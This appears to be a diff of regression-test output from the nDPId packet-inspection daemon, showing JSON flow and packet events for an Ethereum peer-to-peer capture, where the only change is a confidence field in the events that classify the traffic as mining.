00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"} 
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -245,50 +245,50 @@ 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1578508365315,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACcmwpAACMRP2wS26efwKgBuHZfdl8AiLphceZOwZGufNXFAvXWI774ooc6PkwC6kxvzCm0BhiTs\/TWig3gE4P3+Y0lY\/Fll4rTUKnacLSuqKdSUAk7eTbz218E2dS8j3sLMJigll9ziTSt7jKgE6R7GxELpoJhO+ReAQHdBMuEEtunn4J2X4J2X8mETxbOvYLp94CEXhYgYQo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1578508365408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1578508365408,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdhY9AAC4RWjq3gfKkwKgBuAQAdl8AiS5Y3VkKujBE9K5giYMoNotbt65xxd7ko3VSXKgTCSaupxKnp71rmT0XRsX6xoF5macEurqmdfib0\/9m0ybRIVy\/Qzz+\/\/zwyKtEHKyC9Xjjwvc8TLpzNetXjDWFS0pbC\/Z0AQHeBcuErBRsfYJ2X4J2X8uETxbOvYLp94J2X4ReFiBh"} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1578508365409,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACy8oAAAEARGzTAqAG4t4HypHZfBAAAnqbvG70JBv5PXjvCBbR1Rp7tYoTQJi2jMUD7JOn6eWv9REwRmFSXtYoHsvszWP\/amLZkv0asbrMZoJOaxU2yggG3KzVpk0IKmRZiX\/KGqSOqaOPD2NnZ\/WIPpNjQN9gDidCOAQLzy4S3gfKkggQAgnZfoN1ZCrowRPSuYImDKDaLW7euccXe5KN1UlyoEwkmrqcShF4WIGEF"} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1578508365409,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc4fIAAEARK9jAqAG4t4HypHZfBAAAiACVOpGBWjTeJor2OHTFdIkJfHanNwusT7Z+X6ZhMccUpEYH1blVudB+7Lhiy59WZ4RAivu0dgr\/6z5c18c2wNa0j2NMO4UV7uXk8QqS8l0iv7COflKJEb7GBR6jLr1IE7ZSAQHdBMuEfwAAAYJ2X4J2X8mEt4HypIIEAICEXhYgYQU="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1578508365461,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365461,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcQtMAAEARjkPAqAG4ynAcanZfdl8AiDkPCEixaJX\/9thQC0r9cGcsCeen+iETb10JXBU9BZQL28M1nK8vCE6bMd2SC2XGliMqSbi8oqYHUjyrBa753h2KySNTFNso18+nMzMVWvdibnHX4lluxe+\/vRPiYB2kYX3uAAHdBMuEfwAAAYJ2X4J2X8mEynAcaoJ2X4CEXhYgYQU="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1578508365567,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365567,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcHIoAAEARCbPAqAG4agwnqHZfdn0AiGszdDnl2LgHwUzwnp\/NUaAjl2\/6ukAyoGtKBC9U9NcJJ2SSjY1bIBQONPG3UmfcMXvTBTN6oZMu6GXIBxr9UadDckfonN6CsHl3H7EBI7wV8mnDuf+AbUa\/i02tPDo+DL09AAHdBMuEfwAAAYJ2X4J2X8mEagwnqIJ2fYCEXhYgYQU="} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 